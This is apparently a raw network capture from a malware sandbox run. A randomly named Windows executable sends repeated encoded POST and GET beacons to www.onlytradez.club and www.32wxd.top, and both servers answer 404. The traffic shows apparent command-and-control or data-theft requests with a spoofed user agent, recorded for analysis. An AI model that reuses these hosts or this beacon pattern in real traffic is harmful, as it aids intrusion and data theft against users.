                      Aug 23, 2024 08:26:31.507397890 CEST | 1236 | IN | Data Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 67 72 65 65 6e 3a 20 23 44 31 45 34 44 44 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 75 65 3a 20 23 44 31 44 46 45 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                      Data Ascii: wp--preset--color--green: #D1E4DD;--wp--preset--color--blue: #D1DFE4;--wp--preset--color--purple: #D1D1E4;--wp--preset--color--red: #E4D1D1;--wp--preset--color--orange: #E4DAD1;--wp--preset--color--yellow: #EEEADD;--wp--preset--gradient--vivid
                      Aug 23, 2024 08:26:31.507410049 CEST | 332 | IN | Data Raw: 30 25 2c 72 67 62 28 32 35 34 2c 34 35 2c 34 35 29 20 35 30 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c
                      Data Ascii: 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%
                      Aug 23, 2024 08:26:31.507422924 CEST | 1236 | IN | Data Raw: 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e
                      Data Ascii: r-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--gradient--purple-to-yellow: linear-gradient(160deg, #D1D1E4 0%, #EEEADD 1
                      Aug 23, 2024 08:26:31.512497902 CEST | 1236 | IN | Data Raw: 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63
                      Data Ascii: preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--pr


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.6 | 49729 | 167.172.133.32 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:36.650914907 CEST | 763 | OUT | POST /zctj/ HTTP/1.1
                      Host: www.onlytradez.club
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.onlytradez.club
                      Referer: http://www.onlytradez.club/zctj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2b 42 72 76 52 5a 4d 69 6b 4f 73 38 78 66 37 4f 59 76 59 6b 35 69 66 43 32 54 4c 36 70 76 66 4d 55 51 4a 41 77 6f 41 48 5a 34 30 73 51 4f 53 77 4b 31 32 57 71 38 39 41 6e 4d 6e 43 71 70 39 61 75 73 34 78 6f 2b 4e 63 64 39 57 70 62 4a 67 6b 72 4f 44 66 53 52 6c 46 50 6c 47 74 4f 4b 30 44 55 38 41 78 33 62 43 42 32 77 69 61 45 64 6b 38 68 44 56 4b 44 44 72 39 6e 69 47 72 42 68 6a 4a 63 72 74 79 53 67 74 6d 63 70 35 56 71 66 42 6a 62 32 51 32 69 53 32 75 4a 39 75 7a 50 72 47 39 53 70 6f 73 6b 6b 48 73 31 58 46 32 30 6b 49 38 61 79 68 61 34 52 72 48 33 56 53 46 54 58 69 78
                      Data Ascii: Xn70_=gQGQ44pjYQij+BrvRZMikOs8xf7OYvYk5ifC2TL6pvfMUQJAwoAHZ40sQOSwK12Wq89AnMnCqp9aus4xo+Ncd9WpbJgkrODfSRlFPlGtOK0DU8Ax3bCB2wiaEdk8hDVKDDr9niGrBhjJcrtySgtmcp5VqfBjb2Q2iS2uJ9uzPrG9SposkkHs1XF20kI8ayha4RrH3VSFTXix
                      Aug 23, 2024 08:26:37.117222071 CEST | 369 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.26.1
                      Date: Fri, 23 Aug 2024 06:26:37 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.6 | 49731 | 167.172.133.32 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:39.200001001 CEST | 787 | OUT | POST /zctj/ HTTP/1.1
                      Host: www.onlytradez.club
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.onlytradez.club
                      Referer: http://www.onlytradez.club/zctj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 37 4d 4e 79 42 41 33 5a 41 48 51 6f 30 73 62 75 53 31 4f 31 32 4a 71 38 67 39 6e 4a 66 43 71 70 70 61 75 75 67 78 70 50 4e 64 63 74 57 72 55 70 67 36 6d 75 44 66 53 52 6c 46 50 6c 44 77 4f 4b 4d 44 49 63 51 78 33 2f 57 43 38 51 69 5a 46 64 6b 38 77 7a 56 57 44 44 72 44 6e 6a 62 4f 42 6e 2f 4a 63 76 6c 79 53 78 74 35 4c 5a 35 54 33 76 42 32 65 55 6c 6c 73 67 4c 50 4f 74 75 70 4d 6f 53 63 65 2f 70 32 34 58 48 50 6e 48 6c 30 30 6d 51 4f 61 53 68 77 36 52 54 48 6c 43 65 69 63 6a 48 53 52 34 71 38 71 44 34 39 32 4b 2f 68 4a 43 6f 34 48 79 51 4d 52 77 3d 3d
                      Data Ascii: Xn70_=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pc7MNyBA3ZAHQo0sbuS1O12Jq8g9nJfCqppauugxpPNdctWrUpg6muDfSRlFPlDwOKMDIcQx3/WC8QiZFdk8wzVWDDrDnjbOBn/JcvlySxt5LZ5T3vB2eUllsgLPOtupMoSce/p24XHPnHl00mQOaShw6RTHlCeicjHSR4q8qD492K/hJCo4HyQMRw==
                      Aug 23, 2024 08:26:39.647275925 CEST | 369 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.26.1
                      Date: Fri, 23 Aug 2024 06:26:39 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.6 | 49732 | 167.172.133.32 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:41.745754004 CEST | 1800 | OUT | POST /zctj/ HTTP/1.1
                      Host: www.onlytradez.club
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.onlytradez.club
                      Referer: http://www.onlytradez.club/zctj/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 7a 4d 52 58 4e 41 30 2b 55 48 4b 6f 30 73 59 75 53 30 4f 31 32 41 71 38 34 78 6e 4a 61 31 71 72 52 61 68 72 30 78 68 64 6c 64 53 74 57 72 4d 5a 67 37 72 4f 43 4c 53 51 55 4d 50 6c 54 77 4f 4b 4d 44 49 65 34 78 67 37 43 43 76 41 69 61 45 64 6b 77 68 44 56 71 44 46 43 34 6e 6a 75 37 47 52 50 4a 63 4f 5a 79 51 43 46 35 4a 35 35 52 32 76 41 7a 65 55 34 39 73 6b 72 74 4f 75 79 54 4d 71 4f 63 64 72 41 30 6b 30 50 32 6d 52 78 30 71 78 51 46 44 47 51 41 38 57 2f 44 31 44 79 4c 65 6a 4c 62 50 64 69 33 2b 77 70 47 7a 4c 4c 54 4a 46 73 75 45 7a 78 6e 48 4a 36 72 64 4a 59 71 68 77 67 2f 67 59 50 57 33 35 36 78 6b 78 50 37 33 6e 72 4e 75 49 56 49 7a 33 69 63 35 32 2b 33 75 58 70 44 4f 2b 4b 2f 6a 6a 6e 54 6e 71 55 38 54 51 53 79 45 55 57 75 57 6e 75 75 47 47 66 7a 61 4b 41 46 56 74 61 6b 5a 76 48 6e 41 58 6a 53 34 2f 73 72 64 59 41 37 37 4a 45 39 32 4a 49 55 51 69 67 72 [TRUNCATED]
                      Data Ascii: Xn70_=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pczMRXNA0+UHKo0sYuS0O12Aq84xnJa1qrRahr0xhdldStWrMZg7rOCLSQUMPlTwOKMDIe4xg7CCvAiaEdkwhDVqDFC4nju7GRPJcOZyQCF5J55R2vAzeU49skrtOuyTMqOcdrA0k0P2mRx0qxQFDGQA8W/D1DyLejLbPdi3+wpGzLLTJFsuEzxnHJ6rdJYqhwg/gYPW356xkxP73nrNuIVIz3ic52+3uXpDO+K/jjnTnqU8TQSyEUWuWnuuGGfzaKAFVtakZvHnAXjS4/srdYA77JE92JIUQigrEIaknL6JT6HLM5cvSgtZtbftjaaXq3xK4VNL5qKPgDnpnslNk6VoL9FW8K13jRdC6cNYP6BCLPupGVZEPbaEIfmStVAFJtxOLl2N+Z/gsUJqBZUwTy/RB6oVDVzp5XTJGsKviUbeSMgDeFeTm6G1ZXt+5GpxBs+KBRxy/JQdMMnmGEfBgKseGdg1zDGJawaPHpOTh5gRZn/v4l2fC+ZPqait84UlQTrgypaz4ejzd5je9+aUeKdBqYcxXB3xByGqtWKIWI4cEovd91/SC5KYPKeFACHnm/klJUBspPjjLSpzcGMzZCGk4p0hsxxcYqFuiNFDDr1iRSNvE7lX8/j/XlT1oB5DumvOa6Wa9kQE6fCeujCw4pKrKTAlhpwT5WkmYBrRa0HVmE8neK7RAe4MNHQ/MST0GaYBmC3cadjVJNmJAjgtolCnKJibGsbSCpH39g6sHGVsAgNElnRPF/MlgA/dFUNhyhYGnlRF4RlvfhxbunV8+hGaQG/wUSemEvFalihok1lmvI8+jVFlSGDZzlt0zKE2s7PRoPTy6IVWKZ16m8MNvjZT+jfd8n9IUWN2SD/SC0c+GgvmxiKG1Itz05fU40/napVUn7jzNzqQL7yU1Ygvhk3+QYesyj6SrfNPGteanXM4u1d0mxZJdkvUVwTjkrjwaqe/WD [TRUNCATED]
                      Aug 23, 2024 08:26:42.181055069 CEST | 369 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.26.1
                      Date: Fri, 23 Aug 2024 06:26:42 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Content-Encoding: gzip
                      Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.6 | 49733 | 167.172.133.32 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:44.287750959 CEST | 506 | OUT | GET /zctj/?Xn70_=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.onlytradez.club
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:26:44.745959997 CEST | 705 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.26.1
                      Date: Fri, 23 Aug 2024 06:26:44 GMT
                      Content-Type: text/html
                      Content-Length: 555
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      13 | 192.168.2.6 | 49734 | 206.119.82.116 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:50.219079971 CEST | 745 | OUT | POST /kyiu/ HTTP/1.1
                      Host: www.32wxd.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.32wxd.top
                      Referer: http://www.32wxd.top/kyiu/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 2f 32 67 4a 79 76 75 67 42 2f 42 65 43 4a 53 2f 6e 5a 2f 37 62 67 51 31 41 61 48 42 30 55 4e 72 39 69 33 58 71 6b 4e 36 6e 47 32 44 6b 5a 73 4a 42 2b 78 38 37 78 56 30 56 31 39 5a 4b 52 4d 79 4d 78 6b 2b 4a 41 73 4b 70 61 51 6f 33 4a 71 68 74 6e 7a 41 78 38 5a 30 62 4e 5a 30 52 32 48 33 68 65 75 48 32 67 6e 52 73 61 7a 48 4e 31 6b 68 39 76 52 4e 54 31 2b 38 4e 35 6a 73 31 46 5a 4f 55 52 37 2b 38 78 4e 56 68 44 48 4a 59 46 78 45 73 6c 6a 41 44 37 54 49 57 66 58 51 2b 53 48 6e 51 56 68 46 6c 73 65 63 4f 63 70 2b 76 68 4c 62 42 6b 4f 4a 35 54 79 45 69 65 46 6f 44 34 31
                      Data Ascii: Xn70_=aBuNv8bUDAAzG/2gJyvugB/BeCJS/nZ/7bgQ1AaHB0UNr9i3XqkN6nG2DkZsJB+x87xV0V19ZKRMyMxk+JAsKpaQo3JqhtnzAx8Z0bNZ0R2H3heuH2gnRsazHN1kh9vRNT1+8N5js1FZOUR7+8xNVhDHJYFxEsljAD7TIWfXQ+SHnQVhFlsecOcp+vhLbBkOJ5TyEieFoD41
                      Aug 23, 2024 08:26:51.116121054 CEST | 691 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:50 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      14 | 192.168.2.6 | 49735 | 206.119.82.116 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:52.762989044 CEST | 769 | OUT | POST /kyiu/ HTTP/1.1
                      Host: www.32wxd.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.32wxd.top
                      Referer: http://www.32wxd.top/kyiu/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 38 4e 72 64 79 33 57 76 45 4e 35 6e 47 32 4c 45 5a 70 58 78 2b 41 38 37 38 32 30 55 4a 39 5a 4b 56 4d 79 4f 5a 6b 2f 36 6f 76 4c 35 61 57 30 33 4a 37 6c 74 6e 7a 41 78 38 5a 30 62 59 45 30 52 65 48 32 51 4f 75 56 44 41 6f 53 73 61 77 4e 74 31 6b 6c 39 75 57 4e 54 31 58 38 4d 6b 45 73 77 42 5a 4f 56 68 37 36 35 64 43 66 68 44 4e 58 6f 45 54 44 35 63 30 47 78 32 71 4b 6c 65 32 48 76 6a 69 72 47 55 37 5a 57 73 39 4f 65 38 72 2b 74 35 35 62 68 6b 6b 4c 35 72 79 57 31 53 69 6e 33 64 57 61 32 58 4b 63 33 38 67 73 6c 4a 46 58 34 38 36 4a 70 39 4c 7a 77 3d 3d
                      Data Ascii: Xn70_=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBC8Nrdy3WvEN5nG2LEZpXx+A87820UJ9ZKVMyOZk/6ovL5aW03J7ltnzAx8Z0bYE0ReH2QOuVDAoSsawNt1kl9uWNT1X8MkEswBZOVh765dCfhDNXoETD5c0Gx2qKle2HvjirGU7ZWs9Oe8r+t55bhkkL5ryW1Sin3dWa2XKc38gslJFX486Jp9Lzw==
                      Aug 23, 2024 08:26:53.682740927 CEST | 691 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:53 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
